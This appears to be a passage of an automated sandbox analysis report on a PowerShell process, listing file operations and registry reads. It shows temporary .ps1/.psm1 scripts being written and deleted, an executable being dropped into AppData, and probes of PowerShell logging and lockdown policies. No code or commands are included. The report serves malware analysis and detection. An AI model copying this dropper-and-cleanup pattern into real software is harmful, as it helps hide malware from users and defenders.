Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll type = file_attributes False 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe type = file_attributes True 3
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 537 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 4096 True 33
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 3055 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 17, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 950 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 4096 True 68
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 452 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml size = 4096, size_out = 4096 True 51
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml size = 4096, size_out = 2970 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml size = 102, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 size = 4096, size_out = 1528 True 1
Fn
Data
Read C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 size = 520, size_out = 0 True 1
Fn
Read C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 size = 4096, size_out = 0 True 1
Fn
Read C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 size = 4096, size_out = 1509 True 1
Fn
Data
Read C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 size = 539, size_out = 0 True 1
Fn
Read C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 size = 4096, size_out = 0 True 1
Fn
Read C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 size = 4096, size_out = 4096 True 5
Fn
Data
Read C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 size = 4096, size_out = 2756 True 1
Fn
Data
Read C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 size = 316, size_out = 0 True 1
Fn
Read C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 size = 4096, size_out = 0 True 1
Fn
Read C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1 size = 4096, size_out = 737 True 1
Fn
Data
Read C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1 size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config size = 4096, size_out = 4096 True 8
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config size = 4096, size_out = 3215 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config size = 4096, size_out = 0 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex size = 43, size_out = 43 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex size = 9, size_out = 9 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex size = 11, size_out = 11 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex size = 4096, size_out = 3483 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex size = 4096, size_out = 0 True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 size = 4096, size_out = 4096 True 2
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 size = 5, size_out = 5 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 size = 4096, size_out = 2818 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 size = 4096, size_out = 0 True 1
Fn
Read C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 size = 4096, size_out = 2384 True 1
Fn
Data
Read C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 size = 688, size_out = 0 True 1
Fn
Read C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 size = 4096, size_out = 0 True 1
Fn
Write C:\Users\Nd9E1FYi\AppData\Local\Temp\4yreaw5k.md3.ps1 size = 1 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Local\Temp\dppe3wwf.ebw.psm1 size = 1 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex size = 4096 True 4
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex size = 3546 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 4096 True 3
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 10166 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 31944 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 42108 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 5808 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 17684 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 15972 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 5576 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 64344 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 25940 True 1
Fn
Data
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 53362 True 1
Fn
Data
Delete C:\Users\Nd9E1FYi\AppData\Local\Temp\4yreaw5k.md3.ps1 - True 1
Fn
Delete C:\Users\Nd9E1FYi\AppData\Local\Temp\dppe3wwf.ebw.psm1 - True 1
Fn
Registry (299)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\Transcription - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Winevt\Publishers\{5037b0a0-3a31-5cd2-ff19-103e9f160a74} - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 3
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 17
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 5
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 7
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\.NETFramework\XML - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\XML - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 7
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_CURRENT_USER - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 4
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN value_name = ServiceStackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN value_name = ServiceStackVersion, data = 3.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = TZI, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Display, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Display, data = @tzres.dll,-320, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Std, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Std, data = @tzres.dll,-322, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Dlt, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Dlt, data = @tzres.dll,-321, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %ProgramFiles%\WindowsPowerShell\Modules;%SystemRoot%\system32\WindowsPowerShell\v1.0\Modules, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 17
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 5
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 5
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 7
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 7
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 7
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework value_name = LegacyWPADSupport, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 value_name = HWRPortReuseOnSocketBind, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 4
